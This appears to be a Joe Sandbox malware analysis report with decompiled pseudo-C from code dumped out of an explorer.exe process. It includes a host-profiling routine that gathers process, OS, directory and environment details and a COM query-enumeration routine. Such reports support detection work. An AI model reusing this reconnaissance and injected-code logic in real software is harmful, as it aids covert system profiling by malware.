0x000ca78c
0x000ca790
0x000ca79f
0x000ca7a7
0x000ca7b4
0x00000000
0x000ca7b7
0x000ca7ab
0x00000000
0x000ca7ab
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
Instruction ID: 530dcad075266c1156e77377669d94ddcef453a396c3f42a45d0ff379d1e2d4c
Opcode Fuzzy Hash: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
Instruction Fuzzy Hash: 55E09B3530861D6B8B2157A8AC50E9E3765AF4A77C7114716FD258F2D1CA30D84042D2

Uniqueness

Uniqueness Score: -1.00%

Function 000C98A6, Relevance: 1.3, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C98A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E000CA4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E000C984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}

0x000c98aa
0x000c98bc
0x000c98ca
0x000c98d7
0x000c98da
0x000c98e1
0x000c98e1
0x00000000
0x000c98e6
0x00000000

APIs

CloseHandle.KERNELBASE(?), ref: 000C98CA

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
Instruction ID: 761c44297c6940bc27b2f576ce9d72b8e9fb3a67907d93a40376c24e364c2c1d
Opcode Fuzzy Hash: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
Instruction Fuzzy Hash: E0F0A030300B009BC720AF22E848E5BBBE9EF56350700882DE986879A2DB35F8099790

Uniqueness

Uniqueness Score: -1.00%

Function 000CB337, Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E000CB337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0xde684; // 0x14cf8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0xde684; // 0x14cf8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}

0x000cb337
0x000cb33f
0x000cb344
0x000cb34a
0x000cb34e
0x000cb350
0x000cb355
0x000cb35e
0x000cb362
0x000cb362
0x000cb36a
0x00000000
0x000cb36d
0x000cb371

APIs

CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
Instruction ID: 952f55d8802c1bf5a37f67cca09105c85e7c47fe1d2e413aeb41e2f7cc7b4704
Opcode Fuzzy Hash: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
Instruction Fuzzy Hash: B2E04F32301160ABD6606B69EC8CF6B7BA9FB99A91F06016DF905CB151CB24C802C7B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000CD01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000CD01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0xde69c; // 0x10000000
				_t81 = E000C8604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0xde684; // 0x14cf8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E000D2301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E000C8FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E000CBA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E000CBB8D( *_t88) == 0) {
					_t90 = E000CBA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E000CE3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E000CE3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0xde68c; // 0x14cfab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0xde694; // 0x14cfa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E000C8FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E000CB7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E000CB67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E000C8FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E000CD400(_t43, E000CC379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E000CB88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E000CBBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0xde684; // 0x14cf8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000C95E1(_t199, 0x10c);
				_t200 =  *0xde684; // 0x14cf8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0xde684; // 0x14cf8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000C85D5( &_v8);
				_t124 =  *0xde684; // 0x14cf8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E000C9640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0xde684; // 0x14cf8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0xde684; // 0x14cf8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0xde684; // 0x14cf8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0xde684; // 0x14cf8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0xde684; // 0x14cf8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0xde684; // 0x14cf8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E000D2301(E000CD400(_t75, E000CC379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000D22D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E000C902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E000CCD33(_t79);
				return _t222;
			}

0x000cd01f
0x000cd029
0x000cd035
0x000cd03a
0x000cd03f
0x000cd3ff
0x000cd3ff
0x000cd04c
0x000cd052
0x000cd057
0x000cd05d
0x000cd06d
0x000cd079
0x000cd079
0x000cd082
0x000cd088
0x000cd08a
0x000cd093
0x000cd093
0x000cd09f
0x000cd0a3
0x000cd0a8
0x000cd0ae
0x000cd0b7
0x000cd0c5
0x000cd0cc
0x000cd0d1
0x000cd0d1
0x000cd0d2
0x000cd0b9
0x000cd0b9
0x000cd0b9
0x000cd0d8
0x000cd0e3
0x000cd0f1
0x000cd0f7
0x000cd0fb
0x000cd101
0x000cd108
0x000cd10f
0x000cd113
0x000cd11a
0x000cd11b
0x000cd128
0x000cd12a
0x000cd12f
0x000cd13c
0x000cd13e
0x000cd13e
0x000cd140
0x000cd14a
0x000cd156
0x000cd166
0x000cd16c
0x000cd172
0x000cd174
0x000cd185
0x000cd18b
0x000cd191
0x000cd196
0x000cd19c
0x000cd1a2
0x000cd1a7
0x000cd1ac
0x000cd1ac
0x000cd1b2
0x000cd1b2
0x000cd1bb
0x000cd1c7
0x000cd1cf
0x000cd1d3
0x000cd1d3
0x000cd1cf
0x000cd1d7
0x000cd1dd
0x000cd1e3
0x000cd1ea
0x000cd1fb
0x000cd201
0x000cd209
0x000cd210
0x000cd223
0x000cd229
0x000cd22e
0x000cd231
0x000cd234
0x000cd23a
0x000cd240
0x000cd242
0x000cd248
0x000cd251
0x000cd254
0x000cd254
0x000cd257
0x000cd25f
0x000cd26a
0x000cd270
0x000cd261
0x000cd263
0x000cd263
0x000cd279
0x000cd279
0x000cd27f
0x000cd287
0x000cd292
0x000cd297
0x000cd29d
0x000cd29f
0x000cd2ac
0x000cd2ad
0x000cd2ae
0x000cd2b9
0x000cd2bb
0x000cd2c2
0x000cd2c2
0x000cd2cc
0x000cd2d1
0x000cd2d6
0x000cd2d6
0x000cd2dc
0x000cd2e3
0x000cd2e4
0x000cd2f1
0x000cd304
0x000cd309
0x000cd30e
0x000cd317
0x000cd317
0x000cd31d
0x000cd322
0x000cd328
0x000cd32e
0x000cd333
0x000cd33c
0x000cd33e
0x000cd345
0x000cd345
0x000cd34b
0x000cd353
0x000cd358
0x000cd359
0x000cd35e
0x000cd367
0x000cd369
0x000cd374
0x000cd374
0x000cd37d
0x000cd385
0x000cd38c
0x000cd391
0x000cd3a0
0x000cd3b8
0x000cd3bf
0x000cd3cd
0x000cd3df
0x000cd3e6
0x000cd3f3
0x00000000

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

GetCurrentProcessId.KERNEL32 ref: 000CD046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 000CD082
GetCurrentProcess.KERNEL32 ref: 000CD09F
GetLastError.KERNEL32 ref: 000CD13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 000CD16C
GetLastError.KERNEL32 ref: 000CD172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 000CD1C7
GetCurrentProcess.KERNEL32 ref: 000CD20E
memset.MSVCRT ref: 000CD229
GetVersionExA.KERNEL32(00000000), ref: 000CD234
GetCurrentProcess.KERNEL32(00000100), ref: 000CD24E
GetSystemInfo.KERNEL32(?), ref: 000CD26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 000CD287

Strings

TEMP, xrefs: 000CD328, 000CD333, 000CD344
USERPROFILE, xrefs: 000CD2E4, 000CD312
%s\%s, xrefs: 000CD2F9
TEMP, xrefs: 000CD2F3
SystemDrive, xrefs: 000CD353, 000CD35E, 000CD373

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3876402152-2706916422
Opcode ID: 549c9301d8567921ee0cf5015c250f550866b6553047009fadf10b9400dac970
Instruction ID: bb5fc8c38e6f26cdcc8b067c3c65418d8cefabbea5c8d39083ed8debe4d40b99
Opcode Fuzzy Hash: 549c9301d8567921ee0cf5015c250f550866b6553047009fadf10b9400dac970
Instruction Fuzzy Hash: A1B14C71600744ABE710EB74DD89FEE77E8EF58340F00446EF95AD7292EB74AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 000CDB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E000CDB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E000CD523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E000C8604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E000C861A( &_v60, 0xfffffffe);
					E000CD5D7( &_v104);
					return _t320;
				}
				_t165 = E000C95E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000C95E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000C92E5(_t165);
				_v60 = _t322;
				E000C85D5( &_v52);
				E000C85D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000C95E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000C85D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E000C861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000C91E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000C91E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E000C8698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000C8604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E000C861A(_t136, 0);
								E000C861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000C91E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000C95E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000C95E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000C85D5( &_v92);
											E000C85D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E000C9640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000C95E1(_t283, 0x219);
										E000C9640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000C85D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000C91E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E000CDA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E000C861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x000cdb45
0x000cdb4b
0x000cdb52
0x000cdb55
0x000cdb58
0x000cdb5d
0x000cdb5f
0x000cdb64
0x000cdfac
0x000cdfac
0x000cdb71
0x000cdb73
0x000cdb76
0x000cdb79
0x000cdf91
0x000cdf97
0x000cdfa1
0x00000000
0x000cdfa6
0x000cdb84
0x000cdb8b
0x000cdb92
0x000cdb95
0x000cdb9a
0x000cdb9c
0x000cdb9f
0x000cdba2
0x000cdba3
0x000cdbac
0x000cdbb2
0x000cdbb5
0x000cdbbe
0x000cdbc3
0x000cdbc8
0x000cdbdf
0x000cdbec
0x000cdbef
0x000cdbf6
0x000cdbfb
0x000cdc02
0x000cdc07
0x000cdc0e
0x000cdc10
0x000cdc1c
0x000cdc1f
0x000cdc21
0x000cdf81
0x000cdf82
0x000cdf8b
0x00000000
0x000cdf8b
0x000cdc27
0x000cdc2a
0x000cdc2d
0x000cdc30
0x000cdc32
0x000cdf4d
0x000cdf50
0x000cdf53
0x000cdf55
0x000cdf77
0x000cdf7c
0x000cdf57
0x000cdf5a
0x000cdf65
0x000cdf6c
0x000cdf6c
0x00000000
0x00000000
0x00000000
0x00000000
0x000cdc38
0x000cdc38
0x000cdc4a
0x000cdc4d
0x000cdc4f
0x00000000
0x00000000
0x000cdc57
0x000cdc5a
0x000cdc5d
0x000cdc60
0x000cdc63
0x000cdc66
0x00000000
0x00000000
0x000cdc6c
0x000cdc7a
0x000cdc7d
0x000cdc7f
0x000cdc98
0x000cdca7
0x000cdcaf
0x000cdcaf
0x000cdcb2
0x000cdcb9
0x000cdcbd
0x000cdcc3
0x000cdcc5
0x000cdf35
0x000cdf3b
0x000cdf41
0x000cdf44
0x000cdf44
0x00000000
0x000cdf44
0x000cdcd4
0x000cdce8
0x000cdcec
0x000cdcee
0x000cdcf3
0x000cdf02
0x000cdf08
0x000cdf13
0x000cdf1e
0x000cdf24
0x000cdf2a
0x000cdf2d
0x00000000
0x000cdf2d
0x000cdcf9
0x000cded0
0x000cded0
0x000cded3
0x000cded6
0x00000000
0x00000000
0x000cdd01
0x000cdd09
0x000cdd10
0x000cdd16
0x000cdd18
0x00000000
0x00000000
0x000cdd21
0x000cdd36
0x000cdd3c
0x000cdd45
0x000cdd48
0x000cdd4b
0x000cdd4d
0x000cdec3
0x000cdec6
0x000cdecf
0x000cdecf
0x00000000
0x000cdecf
0x000cdd5d
0x000cdd60
0x000cdd67
0x000cdd6d
0x000cdd70
0x000cdd73
0x000cdd76
0x000cdd79
0x000cddb5
0x000cddb5
0x000cddb8
0x000cde64
0x000cde78
0x000cde88
0x000cde8c
0x000cde8e
0x000cdea5
0x000cdea9
0x000cdeb2
0x000cdebd
0x00000000
0x000cdebd
0x000cde94
0x000cde95
0x000cde9a
0x000cde9a
0x000cde9c
0x000cde9d
0x000cdea2
0x00000000
0x000cdea2
0x000cddbe
0x000cddbe
0x000cddc1
0x000cde2c
0x000cde40
0x000cde50
0x000cde54
0x000cde56
0x00000000
0x00000000
0x000cde5c
0x000cde5d
0x00000000
0x000cde5d
0x000cddc3
0x000cddc3
0x000cddc6
0x00000000
0x00000000
0x000cddc8
0x000cddcb
0x00000000
0x00000000
0x000cddcd
0x000cddcd
0x000cddd3
0x000cddef
0x000cddfe
0x000cde07
0x000cde0c
0x000cde0f
0x000cde15
0x000cde15
0x000cde1a
0x000cde26
0x00000000
0x000cde26
0x000cddd8
0x00000000
0x000cddd8
0x000cdd7b
0x000cdda2
0x000cdda7
0x000cddac
0x000cddae
0x000cddae
0x00000000
0x000cddac
0x000cdd7d
0x000cdd7d
0x000cdd80
0x00000000
0x00000000
0x000cdd86
0x000cdd86
0x000cdd89
0x00000000
0x00000000
0x000cdd8f
0x000cdd8f
0x000cdd92
0x00000000
0x00000000
0x000cdd98
0x000cdd9b
0x00000000
0x00000000
0x000cdd9d
0x00000000
0x000cdd9d
0x000cdedf
0x000cdee5
0x000cdeeb
0x000cdeee
0x000cdef1
0x000cdef1
0x000cdef4
0x000cdef5
0x000cdef8
0x000cdefa
0x00000000
0x00000000
0x000cdf4a
0x000cdf4a
0x00000000
0x000cdf4a
0x000cdc81
0x000cdc87
0x00000000
0x000cdc87
0x000cdf47
0x00000000
0x000cdbca
0x000cdbcf
0x000cdbd4
0x00000000
0x000cdbd8

APIs

Part of subcall function 000CD523: CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
